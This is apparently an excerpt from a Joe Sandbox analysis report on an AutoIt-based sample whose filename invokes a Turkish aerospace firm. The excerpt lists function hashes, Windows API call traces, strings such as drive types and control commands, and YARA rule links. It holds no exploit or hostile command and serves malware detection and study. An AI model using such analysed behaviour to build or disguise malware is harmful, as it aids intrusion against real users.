Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: A881967B6080A31DDB6D427A853403EFFE15A933A5B1A079ED4F2CB1C1EF24C954E620

Function 018A1DB8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 41e843f9d6327142bd717b58e2b01b5710d630a9122c7bf09e0cacdffd62edd6
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 2B41C471D1051CDBDF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80

Function 018A1CA8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: c73fd9d0372ba210dc860fb0d55ccc0b8166b2320741a82b41488bec2de81a24
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 2D019D78A00209EFDB84DF98C5949AEF7B5FB48310F608699E809E7741E730AE51DB80

Function 018A1C48 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 37a84f545be361a6f41278005e3d7343be4d7ebdda888a8a24a124c5054f1aa5
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: CA019278A00109EFDB44DF98C5949AEF7B5FB48310F608599D819E7701D730AE51DB80

Function 018A0648 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00202ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00202B30
DeleteObject.GDI32(00000000), ref: 00202B43
DestroyWindow.USER32 ref: 00202B52
GetDesktopWindow.USER32 ref: 00202B6D
GetWindowRect.USER32(00000000), ref: 00202B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00202CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00202CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202CF8
GetClientRect.USER32(00000000,?), ref: 00202D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00202D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202D80
GlobalLock.KERNEL32(00000000), ref: 00202D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202D98
GlobalUnlock.KERNEL32(00000000), ref: 00202DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202DA8
GlobalFree.KERNEL32(00000000), ref: 00202DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0021FC38,00000000), ref: 00202DDB
GlobalFree.KERNEL32(00000000), ref: 00202DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00202E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00202E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00202E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0020303F

Strings

static, xrefs: 00202D3A, 00202E91
DISPLAY, xrefs: 00202EA2
AutoIt v3, xrefs: 00202CF2
, xrefs: 00202FC5

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ab0935688946846bd5732f16389e7f52005029418fcb413f5b5190dd0c7bab88
Instruction ID: 11a86f3bbc9c80ae1fe1bf4eb7cd76436342fb4e6a03df9b973cdfdcf8511374
Opcode Fuzzy Hash: ab0935688946846bd5732f16389e7f52005029418fcb413f5b5190dd0c7bab88
Instruction Fuzzy Hash: 82029A75910209EFDB14DFA4DC8DEAE7BB9EB49710F208159F915AB2A1CB70AD01CF60

Function 002170D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0021712F
GetSysColorBrush.USER32(0000000F), ref: 00217160
GetSysColor.USER32(0000000F), ref: 0021716C
SetBkColor.GDI32(?,000000FF), ref: 00217186
SelectObject.GDI32(?,?), ref: 00217195
InflateRect.USER32(?,000000FF,000000FF), ref: 002171C0
GetSysColor.USER32(00000010), ref: 002171C8
CreateSolidBrush.GDI32(00000000), ref: 002171CF
FrameRect.USER32(?,?,00000000), ref: 002171DE
DeleteObject.GDI32(00000000), ref: 002171E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00217230
FillRect.USER32(?,?,?), ref: 00217262
GetWindowLongW.USER32(?,000000F0), ref: 00217284

Part of subcall function 002173E8: GetSysColor.USER32(00000012), ref: 00217421
Part of subcall function 002173E8: SetTextColor.GDI32(?,?), ref: 00217425
Part of subcall function 002173E8: GetSysColorBrush.USER32(0000000F), ref: 0021743B
Part of subcall function 002173E8: GetSysColor.USER32(0000000F), ref: 00217446
Part of subcall function 002173E8: GetSysColor.USER32(00000011), ref: 00217463
Part of subcall function 002173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00217471
Part of subcall function 002173E8: SelectObject.GDI32(?,00000000), ref: 00217482
Part of subcall function 002173E8: SetBkColor.GDI32(?,00000000), ref: 0021748B
Part of subcall function 002173E8: SelectObject.GDI32(?,?), ref: 00217498
Part of subcall function 002173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002174B7
Part of subcall function 002173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002174CE
Part of subcall function 002173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002174DB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: e449238219badb04524a0d8e79dbc32b49e1c98479a428cc1523b45db172b66f
Instruction ID: 7283d4f528a5314b82256888039a5116f59e2d5162a5c9420f975a353b430b41
Opcode Fuzzy Hash: e449238219badb04524a0d8e79dbc32b49e1c98479a428cc1523b45db172b66f
Instruction Fuzzy Hash: 0AA1B076058301BFDB009F60EC4CA9B7BF9FB98320F204A19F966A61E0DB70E945CB51

Function 00198D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00198E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 001D6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001D6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001D6F43

Part of subcall function 00198F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00198BE8,?,00000000,?,?,?,?,00198BBA,00000000,?), ref: 00198FC5

SendMessageW.USER32(?,00001053), ref: 001D6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001D6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 001D6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 001D6FB7

Strings

0, xrefs: 001D6DCF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 825959595e82e3f82f883393e00fca7f5bbe8924a35dcf10ecd504895545ec9b
Instruction ID: 929074453c68b3caebf6706305a75e8bdb5d1363296acb88bf21fccaa8a4dd6f
Opcode Fuzzy Hash: 825959595e82e3f82f883393e00fca7f5bbe8924a35dcf10ecd504895545ec9b
Instruction Fuzzy Hash: A712BD34600611EFDB25CF28E898BBAB7E5FB55301F24856AF4958B261CB31EC51CF91

Function 00202711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0020273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0020286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002028A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002028B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00202900
GetClientRect.USER32(00000000,?), ref: 0020290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00202955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00202964
GetStockObject.GDI32(00000011), ref: 00202974
SelectObject.GDI32(00000000,00000000), ref: 00202978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00202988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00202991
DeleteDC.GDI32(00000000), ref: 0020299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002029C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002029DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00202A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00202A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00202A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00202A77
GetStockObject.GDI32(00000011), ref: 00202A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00202A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00202A97

Strings

static, xrefs: 0020294F, 00202A71
DISPLAY, xrefs: 0020295A
AutoIt v3, xrefs: 002028F8
msctls_progress32, xrefs: 00202A13

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 9fcf96532ab4a743d4ada18a98d731edaf5022bb05451fdbaf6bc45be262b18b
Instruction ID: b10b85b4d2711d865679d81cd1a796f551a7b07d2fed912c74cdd0dd515c95a6
Opcode Fuzzy Hash: 9fcf96532ab4a743d4ada18a98d731edaf5022bb05451fdbaf6bc45be262b18b
Instruction Fuzzy Hash: C6B18B75A40205BFEB14DF68DC89FAEBBA9EB08710F108155F914E72E1DB70AD10CBA4

Function 001F4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001F4AED
GetDriveTypeW.KERNEL32(?,0021CB68,?,\\.\,0021CC08), ref: 001F4BCA
SetErrorMode.KERNEL32(00000000,0021CB68,?,\\.\,0021CC08), ref: 001F4D36

Strings

SCSI, xrefs: 001F4C8A
MMC, xrefs: 001F4CDE
ATAPI, xrefs: 001F4C91
RAID, xrefs: 001F4CBB
Removable, xrefs: 001F4C10, 001F4C15
Unknown, xrefs: 001F4BED, 001F4C83
ATA, xrefs: 001F4C98
Fibre, xrefs: 001F4CAD
CDROM, xrefs: 001F4BFB
SSD, xrefs: 001F4C4A
SATA, xrefs: 001F4CD0
1394, xrefs: 001F4C9F
iSCSI, xrefs: 001F4CC2
SSA, xrefs: 001F4CA6
\\.\, xrefs: 001F4B3F
Virtual, xrefs: 001F4CE5
FileBackedVirtual, xrefs: 001F4CEC
USB, xrefs: 001F4CB4
SAS, xrefs: 001F4CC9
RAMDisk, xrefs: 001F4BF4
Network, xrefs: 001F4C02
PhysicalDrive, xrefs: 001F4B76
Fixed, xrefs: 001F4C09

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: d671423e51c37d4aedf903ad4bb21d53a7090d65c22ffcd546ba116412c990a6
Instruction ID: a081f4bcee2141af42244455b7b9b391dfbadc1ef799107d48fc5f4f001f115f
Opcode Fuzzy Hash: d671423e51c37d4aedf903ad4bb21d53a7090d65c22ffcd546ba116412c990a6
Instruction Fuzzy Hash: EB61F630B0520DDBCB0CEF64C989DBE77B0AF56710B249015F906AB692CB32DE52DB52

Function 002173E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00217421
SetTextColor.GDI32(?,?), ref: 00217425
GetSysColorBrush.USER32(0000000F), ref: 0021743B
GetSysColor.USER32(0000000F), ref: 00217446
CreateSolidBrush.GDI32(?), ref: 0021744B
GetSysColor.USER32(00000011), ref: 00217463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00217471
SelectObject.GDI32(?,00000000), ref: 00217482
SetBkColor.GDI32(?,00000000), ref: 0021748B
SelectObject.GDI32(?,?), ref: 00217498
InflateRect.USER32(?,000000FF,000000FF), ref: 002174B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002174CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002174DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0021752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00217554
InflateRect.USER32(?,000000FD,000000FD), ref: 00217572
DrawFocusRect.USER32(?,?), ref: 0021757D
GetSysColor.USER32(00000011), ref: 0021758E
SetTextColor.GDI32(?,00000000), ref: 00217596
DrawTextW.USER32(?,002170F5,000000FF,?,00000000), ref: 002175A8
SelectObject.GDI32(?,?), ref: 002175BF
DeleteObject.GDI32(?), ref: 002175CA
SelectObject.GDI32(?,?), ref: 002175D0
DeleteObject.GDI32(?), ref: 002175D5
SetTextColor.GDI32(?,?), ref: 002175DB
SetBkColor.GDI32(?,?), ref: 002175E5

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: e87d67e444982466d4555559d8393df044101eca049e01b2d35e536ad2fc0931
Instruction ID: d98e48c9a7bebf427d172edd166da1b1fc3fe17b45b7a41e1ccbbcef91c6cfe6
Opcode Fuzzy Hash: e87d67e444982466d4555559d8393df044101eca049e01b2d35e536ad2fc0931
Instruction Fuzzy Hash: CC616E76940219BFDF019FA4EC49AEE7FB9EB58320F218115F915BB2A1DB709940CF90

Function 00210FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00211128
GetDesktopWindow.USER32 ref: 0021113D
GetWindowRect.USER32(00000000), ref: 00211144
GetWindowLongW.USER32(?,000000F0), ref: 00211199
DestroyWindow.USER32(?), ref: 002111B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002111ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0021120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0021121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00211232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00211245
IsWindowVisible.USER32(00000000), ref: 002112A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002112BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002112D0
GetWindowRect.USER32(00000000,?), ref: 002112E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0021130E
GetMonitorInfoW.USER32(00000000,?), ref: 00211328
CopyRect.USER32(?,?), ref: 0021133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002113AA

Strings

0, xrefs: 002110D3
(, xrefs: 0021131B
tooltips_class32, xrefs: 002111E6

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f87806654e842c7be96eca0c5037e1baa6e1cbf3524ab83ae091b36130297118
Instruction ID: 775aeadc9af1374bc2ae7c34e4d55ae1874316f7dfdf48825324053495c2e292
Opcode Fuzzy Hash: f87806654e842c7be96eca0c5037e1baa6e1cbf3524ab83ae091b36130297118
Instruction Fuzzy Hash: 0CB19F71618341AFD704DF64D884BAABBE4FF94350F00891CFA999B2A1CB71D8A4CF91

Function 00210241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002102E5
_wcslen.LIBCMT ref: 0021031F
_wcslen.LIBCMT ref: 00210389
_wcslen.LIBCMT ref: 002103F1
_wcslen.LIBCMT ref: 00210475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002104C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00210504

Part of subcall function 0019F9F2: _wcslen.LIBCMT ref: 0019F9FD

Part of subcall function 001E223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001E2258
Part of subcall function 001E223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001E228A

Strings

ISSELECTED, xrefs: 002104DD
GETSUBITEMCOUNT, xrefs: 00210384, 0021039F
GETSELECTEDCOUNT, xrefs: 00210470, 0021048B
FINDITEM, xrefs: 00210627
SELECTALL, xrefs: 00210515
SELECTCLEAR, xrefs: 0021052D
DESELECT, xrefs: 0021059C
SELECT, xrefs: 00210548
GETTEXT, xrefs: 002103EC, 00210407
SELECTINVERT, xrefs: 0021057E
GETITEMCOUNT, xrefs: 00210316, 00210337
VIEWCHANGE, xrefs: 00210675
GETSELECTED, xrefs: 002105E1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 43691cccc738936aca1009e6cf2f10ddb0b0bd806763a13d5f661a0bdd71ef54
Instruction ID: 27e9d41f0a75349f187029e4d06be240bd2900d955b39b4adb7374a89194e22d
Opcode Fuzzy Hash: 43691cccc738936aca1009e6cf2f10ddb0b0bd806763a13d5f661a0bdd71ef54
Instruction Fuzzy Hash: 54E1D1312282419FC714EF24C4D08AEB3E6BFE8718B54496DF8969B2A1DB70EDD5CB41

Function 00198891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00198968
GetSystemMetrics.USER32(00000007), ref: 00198970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0019899B
GetSystemMetrics.USER32(00000008), ref: 001989A3
GetSystemMetrics.USER32(00000004), ref: 001989C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001989E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001989F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00198A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00198A3C
GetClientRect.USER32(00000000,000000FF), ref: 00198A5A
GetStockObject.GDI32(00000011), ref: 00198A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00198A81

Part of subcall function 0019912D: GetCursorPos.USER32(?), ref: 00199141
Part of subcall function 0019912D: ScreenToClient.USER32(00000000,?), ref: 0019915E
Part of subcall function 0019912D: GetAsyncKeyState.USER32(00000001), ref: 00199183
Part of subcall function 0019912D: GetAsyncKeyState.USER32(00000002), ref: 0019919D

SetTimer.USER32(00000000,00000000,00000028,001990FC), ref: 00198AA8

Strings

AutoIt v3 GUI, xrefs: 00198A20

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

